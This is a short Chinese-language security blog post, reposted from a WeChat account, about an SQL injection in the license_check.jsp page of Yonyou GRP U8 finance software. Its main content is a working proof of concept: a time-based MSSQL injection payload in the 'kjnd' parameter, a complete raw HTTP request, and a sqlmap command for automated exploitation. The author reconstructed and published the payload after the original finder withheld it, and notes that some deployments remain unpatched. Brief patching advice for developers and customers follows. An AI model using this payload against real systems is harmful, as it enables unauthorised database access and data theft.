用友 GRP U8 u8qx/license_check.jsp 存在SQL注入

admin 2024年2月17日13:22:35评论25 views字数 702阅读2分20秒阅读模式

废话

用友大哥上回这是专门给我打了个补丁,我发完三个小时就发布公告和补丁了,感觉自己被重视了。

用友 GRP U8 u8qx/license_check.jsp 存在SQL注入

用友 GRP U8 u8qx/license_check.jsp 存在SQL注入

正题

这个漏洞我看别人刚发的,我在官方补丁里没找到,发的人也没把poc放出来,参数名没打码,叫 kjnd放到什么付费星球了,我就根据打码信息找一下。

上回发的【附POC】用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞 这篇也是u8qx路径下jsp的有SQL注入,payload如下:

';WAITFOR DELAY '0:0:5'-- q

这次我猜这次payload还是这个,您猜怎么着,那叫一个地道,那叫一个美,妈妈的味道!

用友 GRP U8 u8qx/license_check.jsp 存在SQL注入

poc数据包献上:

GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Connection: close

sqlmap命令如下:

sqlmap -u http://127.0.0.1/u8qx/license_check.jsp?kjnd=1 -dbms=mssql

用友 GRP U8 u8qx/license_check.jsp 存在SQL注入

建议

开发:建议把u8qx下的所有jsp进行测试,这玩意漏洞真多。

客户:找资产的时候有的系统已经修了,建议没修的联系销售让用友售后打补丁。

白帽子:建议把漏洞交给我,不要给别人。

原文始发于微信公众号(浪飒sec):用友 GRP U8 u8qx/license_check.jsp 存在SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月17日13:22:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 GRP U8 u8qx/license_check.jsp 存在SQL注入https://cn-sec.com/archives/2132306.html

发表评论

匿名网友 填写信息